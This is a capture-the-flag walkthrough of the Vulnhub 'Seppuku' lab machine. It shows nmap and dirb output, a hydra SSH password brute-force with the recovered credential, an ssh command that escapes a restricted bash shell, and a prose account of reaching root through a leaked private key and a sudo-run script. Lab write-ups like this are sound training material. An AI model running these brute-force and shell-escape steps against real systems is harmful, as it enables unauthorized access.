Proving Ground Play: Seppuku Walkthrough
Embark on an exciting journey through Seppuku:1 Vulnhub challenge. Learn how to uncover hidden secrets, decode keys, and bypass restrictions. Crack passwords, escalate privileges, and claim victory by capturing the final flag. Join us in this cybersecurity adventure and discover the thrill of hacking puzzles.
Let’s start with the first things first, Do a nmap scan to see what ports are open and what services are running on these ports.
Nmap scan report for 192.168.173.90
Host is up (0.16s latency).
Not shown: 57439 closed tcp ports (conn-refused), 8088 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA)
| 256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA)
|_ 256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: 401 Authorization Required
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Restricted Content
|_http-server-header: nginx/1.14.2
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open ` V Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open ssl/empoweri@
| tls-alpn:
| h2
| spdy/3
| spdy/2
|_ http/1.1
|_http-title: Did not follow redirect to https://192.168.173.90:7080
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US
| Not valid before: 2020-05-13T06:51:35
|_Not valid after: 2022-08-11T06:51:35
7601/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Seppuku
8088/tcp open http LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Seppuku
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h20m01s, deviation: 2h18m35s, median: 0s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: seppuku
| NetBIOS computer name: SEPPUKU\x00
| Domain name: \x00
| FQDN: seppuku
|_ System time: 2023-08-09T08:30:43-04:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-08-09T12:30:46
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.70 seconds
For more detail, we will be needing to start enumeration against the host machine. Since port 7601 is open I look toward browser and explore target but unfortunately found nothing useful.
We have web page running, Nothing interesting found. Let’s brute force the directories.
dirb http://192.168.173.90:7601/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Aug 9 08:45:17 2023
URL_BASE: http://192.168.173.90:7601/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.173.90:7601/ ----
==> DIRECTORY: http://192.168.173.90:7601/a/
==> DIRECTORY: http://192.168.173.90:7601/b/
==> DIRECTORY: http://192.168.173.90:7601/c/
==> DIRECTORY: http://192.168.173.90:7601/ckeditor/
==> DIRECTORY: http://192.168.173.90:7601/d/
==> DIRECTORY: http://192.168.173.90:7601/database/
==> DIRECTORY: http://192.168.173.90:7601/e/
==> DIRECTORY: http://192.168.173.90:7601/f/
==> DIRECTORY: http://192.168.173.90:7601/h/
+ http://192.168.173.90:7601/index.html (CODE:200|SIZE:171)
==> DIRECTORY: http://192.168.173.90:7601/keys/
==> DIRECTORY: http://192.168.173.90:7601/production/
==> DIRECTORY: http://192.168.173.90:7601/q/
==> DIRECTORY: http://192.168.173.90:7601/r/
==> DIRECTORY: http://192.168.173.90:7601/secret/
+ http://192.168.173.90:7601/server-status (CODE:403|SIZE:281)
(!) FATAL: Too many errors connecting to host
(Possible cause: COULDNT CONNECT)
We have found two interesting directories keys and secret. Let’s see what is in there.
When we navigate URL enumerated above, i.e. keys we found some files, here private was useful for us.
This link leads us to a page called private. This is a private key for some user which we have not found yet.
Further, we will explore our next directory called secret which we found in our dirb scan. As result it gives some very important files such as password.lst and hostname.
Here found a file named hostname which gave us a username i.e. seppuku.
We have got username seppuku , now our next job is to find the password for the user seppuku with the help of hydra for SSH login brute force. Here the best way to guess password is to use the password file which we found in the secret directory during dirb scan.
hydra -l seppuku -P password.lst 192.168.173.90 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-09 08:49:45
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 93 login tries (l:1/p:93), ~6 tries per task
[DATA] attacking ssh://192.168.173.90:22/
[22][ssh] host: 192.168.173.90 login: seppuku password: eeyoree
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-09 08:50:42
We have a username and password, so we tried to access the SSH on the target system and we were successfully able to log in.
Now we got in, But we are in a restricted bash shell, So we are restricted to perform some actions, So first we have to break the restriction of that to do so, We can use following command.
ssh seppuku@192.168.173.90 -t "bash --noprofile"
Now after looking the home directory, we have three users tanto, samurai and seppuku. We have password and an ssh key which we get earlier.
Now we can try password we have got for these two users.
We got in as samurai.
If you remembered we have enumerated private key when while performing directory brute force, here I copied the content of private file found in key during dirb scan and saved it into an empty file named sshkey with chmod 600 permissions.
After login as tanto, we looked for .cgi_bin directory that will be executed through sudo user but unfortunately, I was unable to find this directory, therefore, I made a directory as .cgi_bin and save the bash script in a file named as “bin” to get bash shell through it.
Now it was time to exploit .cgi_bin program, thus again we logged as Samurai and run the following command and obtain the root shell and finished the challenge by capturing the root flag.
We are root, Stay tuned :)